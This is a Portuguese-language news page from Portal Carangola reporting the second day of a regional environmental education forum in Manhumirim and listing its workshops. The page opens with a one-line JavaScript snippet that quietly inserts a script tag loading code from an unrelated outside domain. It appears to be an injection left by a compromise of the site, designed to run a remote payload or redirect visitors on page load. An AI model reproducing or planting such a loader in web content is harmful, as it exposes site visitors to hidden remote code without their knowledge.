;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Segundo dia do Forea. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Segundo dia do Forea.

O segundo dia do Fórum Regional de Educação Ambiental, Forea, que está acontecendo em Manhumirim, foi marcado pela realização de palestras e oficinas. Foram realizadas 15 oficinas, sendo elas: Coleta Seletiva com Inclusão Social, Confecção de papel reciclado com fibras naturais, Cafeicultura: Impactos Ambientais e Boas Práticas, Oficina Básica de Educação Alimentar – Cozinha Experimental, Reaproveitamento do Óleo Doméstico, Confecção de Bolas Retornáveis, Regularização Ambiental de Propriedades Rurais e Urbanas, Arte com Materiais Recicláveis, Vegetação como Instrumento de Recuperação de Taludes ou Encostas dos Morros e Aterros, elaboração de Projetos, Preparação de Doces com Café e Frutas Regionais, Fontes de recursos para projetos, Consórcio Caparaó e suas atividades, Práticas Pedagógicas em educação ambiental.

As oficinas assim como as palestras foram muito elogiadas pelos participantes. Hoje sexta – feira, 17, no último dia de evento, será elaborado o documento final, com representantes dos municípios e coordenação técnica do Fórum. Além disso, será definido o município sede do próximo Forea.

Valdir Vieira – Assessoria de Comunicação – Prefeitura de Manhumirim.

Ofertas

 


One thought on “Segundo dia do Forea.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.